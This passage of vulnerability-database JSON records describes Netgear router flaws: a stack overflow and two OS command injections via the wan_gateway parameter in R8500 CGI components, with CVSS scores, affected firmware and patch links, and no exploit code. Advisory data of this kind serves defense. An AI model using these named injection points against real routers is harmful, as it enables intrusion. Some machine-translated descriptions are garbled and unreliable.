},
{
"model": "r6400v2",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.128"
},
{
"model": "r8500",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.160"
},
{
"model": "r7000p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "xr300",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6400v2",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023483"
},
{
"db": "NVD",
"id": "CVE-2024-51003"
}
]
},
"cve": "CVE-2024-51003",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "HIGH",
"baseScore": 5.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.1,
"id": "CVE-2024-51003",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 5.7,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2024-023483",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2024-51003",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "OTHER",
"id": "JVNDB-2024-023483",
"trust": 0.8,
"value": "Medium"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023483"
},
{
"db": "NVD",
"id": "CVE-2024-51003"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear R8500 v1.0.2.160, XR300 v1.0.3.78, R7000P v1.3.3.154, and R6400 v2 1.0.4.128 were discovered to multiple stack overflow vulnerabilities in the component ap_mode.cgi via the apmode_dns1_pri and apmode_dns1_sec parameters. These vulnerabilities allow attackers to cause a Denial of Service (DoS) via a crafted POST request. R8500 firmware, XR300 firmware, R7000P A classic buffer overflow vulnerability exists in multiple Netgear products, including firmware.Service operation interruption (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-51003"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023483"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-51003",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023483",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023483"
},
{
"db": "NVD",
"id": "CVE-2024-51003"
}
]
},
"id": "VAR-202411-2227",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.47773457333333336
},
"last_update_date": "2025-05-09T23:31:15.533000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
},
{
"problemtype": "Classic buffer overflow (CWE-120) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023483"
},
{
"db": "NVD",
"id": "CVE-2024-51003"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.netgear.com/about/security/"
},
{
"trust": 1.0,
"url": "https://github.com/wudipjq/my_vuln/blob/main/netgear4/vuln_49/49.md"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-51003"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023483"
},
{
"db": "NVD",
"id": "CVE-2024-51003"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023483"
},
{
"db": "NVD",
"id": "CVE-2024-51003"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-05-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-023483"
},
{
"date": "2024-11-05T15:15:24.300000",
"db": "NVD",
"id": "CVE-2024-51003"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-05-08T04:42:00",
"db": "JVNDB",
"id": "JVNDB-2024-023483"
},
{
"date": "2025-05-07T15:24:54.143000",
"db": "NVD",
"id": "CVE-2024-51003"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Classic buffer overflow vulnerability in multiple Netgear products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023483"
}
],
"trust": 0.8
}
}
VAR-202411-0689
Vulnerability from variot - Updated: 2025-05-09 23:11Netgear R8500 v1.0.2.160 was discovered to contain a command injection vulnerability in the wan_gateway parameter at bsw_fix.cgi. This vulnerability allows attackers to execute arbitrary OS commands via a crafted request. (DoS) It may be in a state. NETGEAR R8500 is a wireless router from NETGEAR. The vulnerability is caused by the wan_gateway parameter in the bsw_fix.cgi component failing to properly filter special characters and commands in the constructed command
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202411-0689",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r8500",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.160"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": "r8500 firmware 1.0.2.160"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.6,
"vendor": "netgear",
"version": "v1.0.2.160"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44808"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023435"
},
{
"db": "NVD",
"id": "CVE-2024-52021"
}
]
},
"cve": "CVE-2024-52021",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.7,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 5.1,
"id": "CNVD-2024-44808",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.1,
"id": "CVE-2024-52021",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 8.0,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2024-023435",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2024-52021",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "OTHER",
"id": "JVNDB-2024-023435",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2024-44808",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44808"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023435"
},
{
"db": "NVD",
"id": "CVE-2024-52021"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear R8500 v1.0.2.160 was discovered to contain a command injection vulnerability in the wan_gateway parameter at bsw_fix.cgi. This vulnerability allows attackers to execute arbitrary OS commands via a crafted request. (DoS) It may be in a state. NETGEAR R8500 is a wireless router from NETGEAR. The vulnerability is caused by the wan_gateway parameter in the bsw_fix.cgi component failing to properly filter special characters and commands in the constructed command",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-52021"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023435"
},
{
"db": "CNVD",
"id": "CNVD-2024-44808"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-52021",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023435",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2024-44808",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44808"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023435"
},
{
"db": "NVD",
"id": "CVE-2024-52021"
}
]
},
"id": "VAR-202411-0689",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44808"
}
],
"trust": 1.1115042
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44808"
}
]
},
"last_update_date": "2025-05-09T23:11:36.791000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for NETGEAR R8500 bsw_fix.cgi component command injection vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/612591"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44808"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "OS Command injection (CWE-78) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023435"
},
{
"db": "NVD",
"id": "CVE-2024-52021"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.netgear.com/about/security/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-52021"
},
{
"trust": 1.0,
"url": "https://github.com/wudipjq/my_vuln/blob/main/netgear4/vuln_47/47.md"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-44808"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023435"
},
{
"db": "NVD",
"id": "CVE-2024-52021"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2024-44808"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023435"
},
{
"db": "NVD",
"id": "CVE-2024-52021"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-11-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2024-44808"
},
{
"date": "2025-05-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-023435"
},
{
"date": "2024-11-05T15:15:26.997000",
"db": "NVD",
"id": "CVE-2024-52021"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-11-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2024-44808"
},
{
"date": "2025-05-08T00:35:00",
"db": "JVNDB",
"id": "JVNDB-2024-023435"
},
{
"date": "2025-05-02T15:39:42.457000",
"db": "NVD",
"id": "CVE-2024-52021"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "of netgear \u00a0R8500\u00a0 in the firmware \u00a0OS\u00a0 Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023435"
}
],
"trust": 0.8
}
}
VAR-202411-1273
Vulnerability from variot - Updated: 2025-05-09 03:22Netgear R8500 v1.0.2.160 was discovered to contain a command injection vulnerability in the wan_gateway parameter at wiz_fix2.cgi. This vulnerability allows attackers to execute arbitrary OS commands via a crafted request. (DoS) It may be in a state. NETGEAR R8500 is a wireless router from NETGEAR. The vulnerability is caused by the wan_gateway parameter in the wiz_fix2.cgi component failing to properly filter special characters and commands in the constructed command
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202411-1273",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r8500",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.160"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": "r8500 firmware 1.0.2.160"
},
{
"model": "r8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.6,
"vendor": "netgear",
"version": "v1.0.2.160"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45307"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023224"
},
{
"db": "NVD",
"id": "CVE-2024-52020"
}
]
},
"cve": "CVE-2024-52020",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.7,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 5.1,
"id": "CNVD-2024-45307",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.1,
"id": "CVE-2024-52020",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 8.0,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2024-023224",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2024-52020",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "OTHER",
"id": "JVNDB-2024-023224",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2024-45307",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45307"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023224"
},
{
"db": "NVD",
"id": "CVE-2024-52020"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear R8500 v1.0.2.160 was discovered to contain a command injection vulnerability in the wan_gateway parameter at wiz_fix2.cgi. This vulnerability allows attackers to execute arbitrary OS commands via a crafted request. (DoS) It may be in a state. NETGEAR R8500 is a wireless router from NETGEAR. The vulnerability is caused by the wan_gateway parameter in the wiz_fix2.cgi component failing to properly filter special characters and commands in the constructed command",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-52020"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023224"
},
{
"db": "CNVD",
"id": "CNVD-2024-45307"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-52020",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023224",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2024-45307",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45307"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023224"
},
{
"db": "NVD",
"id": "CVE-2024-52020"
}
]
},
"id": "VAR-202411-1273",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45307"
}
],
"trust": 1.1115042
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45307"
}
]
},
"last_update_date": "2025-05-09T03:22:01.304000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for NETGEAR R8500 wiz_fix2.cgi component command injection vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/612651"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45307"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "OS Command injection (CWE-78) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023224"
},
{
"db": "NVD",
"id": "CVE-2024-52020"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.netgear.com/about/security/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-52020"
},
{
"trust": 1.0,
"url": "https://github.com/wudipjq/my_vuln/blob/main/netgear4/vuln_47/47.md"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45307"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023224"
},
{
"db": "NVD",
"id": "CVE-2024-52020"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2024-45307"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023224"
},
{
"db": "NVD",
"id": "CVE-2024-52020"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-11-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2024-45307"
},
{
"date": "2025-05-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-023224"
},
{
"date": "2024-11-05T15:15:26.917000",
"db": "NVD",
"id": "CVE-2024-52020"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-11-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2024-45307"
},
{
"date": "2025-05-07T00:37:00",
